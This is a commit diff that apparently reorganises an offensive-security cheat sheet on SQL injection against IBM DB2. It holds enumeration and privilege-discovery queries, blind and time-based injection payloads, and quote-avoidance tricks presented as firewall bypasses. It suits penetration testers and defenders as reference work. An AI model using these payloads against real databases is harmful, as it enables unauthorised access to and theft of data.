DB2 Injection updates

This commit is contained in:
Swissky 2024-11-17 18:37:07 +01:00
parent 3c5bab0338
commit b98f8ca587

View file

@ -5,203 +5,127 @@
## Summary ## Summary
* [DB2 Cheatsheet](#db2-cheatsheet) * [DB2 Comments](#db2-comments)
* [DB2 Default Databases](#db2-default-databases)
* [DB2 Enumeration](#db2-enumeration)
* [DB2 Methodology](#db2-methodology)
* [DB2 Error Based](#db2-error-based)
* [DB2 Blind Based](#db2-blind-based)
* [DB2 Time Based](#db2-time-based)
* [DB2 WAF Bypass](#db2-waf-bypass)
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references) * [References](#references)
## DB2 Cheatsheet ## DB2 Comments
### Version | Type | Description |
| -------------------------- | --------------------------------- |
| `--` | SQL comment |
## DB2 Default Databases
| Name | Description |
| ----------- | --------------------------------------------------------------------- |
| SYSIBM | Core system catalog tables storing metadata for database objects. |
| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
## DB2 Enumeration
| Description | SQL Query |
| ---------------- | ----------------------------------------- |
| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
| Current user | `select user from sysibm.sysdummy1` |
| Current user | `select session_user from sysibm.sysdummy1` |
| Current user | `select system_user from sysibm.sysdummy1` |
| Current database | `select current server from sysibm.sysdummy1` |
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
## DB2 Methodology
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
| List databases | `SELECT schemaname FROM syscat.schemata;` |
| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
| List tables | `SELECT table_name FROM sysibm.tables` |
| List tables | `SELECT name FROM sysibm.systables` |
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
## DB2 Error Based
```sql ```sql
select versionnumber, version_timestamp from sysibm.sysversions; -- Returns all in one xml-formatted string
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo select xmlagg(xmlrow(table_schema)) from sysibm.tables
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
```
### Comments -- Same but without repeated elements
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
```sql -- Returns all in one xml-formatted string.
select blah from foo -- comment like this (double dash) -- May need CAST(xml2clob(… AS varchar(500)) to display the result.
``` select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
### Current User
```sql
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
```
### List Users
DB2 uses OS accounts
```sql
select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous
```
### List Privileges
```sql
select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user
select * from syscat.dbauth where grantee = current user;;
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
```
### List DBA Accounts
```sql
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = Y or SYSADMAUTH = G
```
### Current Database
```sql
select current server from sysibm.sysdummy1
```
### List Databases
```sql
select distinct(table_catalog) from sysibm.tables
SELECT schemaname FROM syscat.schemata;
```
### List Columns
```sql
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
```
### List Tables
```sql
select table_name from sysibm.tables
select name from sysibm.systables
```
### Find Tables From Column Name
```sql
select tbname from sysibm.syscolumns where name='username'
```
### Select Nth Row
```sql
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
```
### Select Nth Char
```sql
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
```
### Bitwise AND/OR/NOT/XOR
```sql
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
```
### ASCII Value
```sql
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
```
### Char -> ASCII Value
```sql
select ascii('A') from sysibm.sysdummy1 -- returns 65
```
### Casting
```sql
select cast('123' as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1
```
### String Concat
```sql
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
``` ```
### IF Statement ## DB2 Blind Based
Seems only allowed in stored procedures. Use case logic instead.
### Case Statement | Description | SQL Query |
| ---------------- | ------------------------------------------ |
```sql | Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1 | ASCII value | `select chr(65) from sysibm.sysdummy1` |
``` | CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
### Avoiding Quotes ## DB2 Time Based
```sql Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
```
### Time Delay
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
```sql ```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 ' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
``` ```
### Serialize to XML (for error based)
## DB2 WAF Bypass
### Avoiding Quotes
```sql ```sql
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
``` ```
### Command Execution and Local File Access
Seems it's only allowed from procedures or UDFs. ## DB2 Accounts and Privileges
### Hostname/IP and OS INFO | Description | SQL Query |
| ---------------- | ------------------------------------ |
```sql | List users | `select distinct(grantee) from sysibm.systabauth` |
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv | List users | `select distinct(definer) from syscat.schemata` |
``` | List users | `select distinct(authid) from sysibmadm.privileges` |
| List users | `select grantee from syscat.dbauth` |
### Location of DB Files | List privileges | `select * from syscat.tabauth` |
| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
```sql | List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv | List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
``` | Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
### System Config
```sql
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
```
### Default System Database
* SYSIBM
* SYSCAT
* SYSSTAT
* SYSPUBLIC
* SYSIBMADM
* SYSTOOLs
## References ## References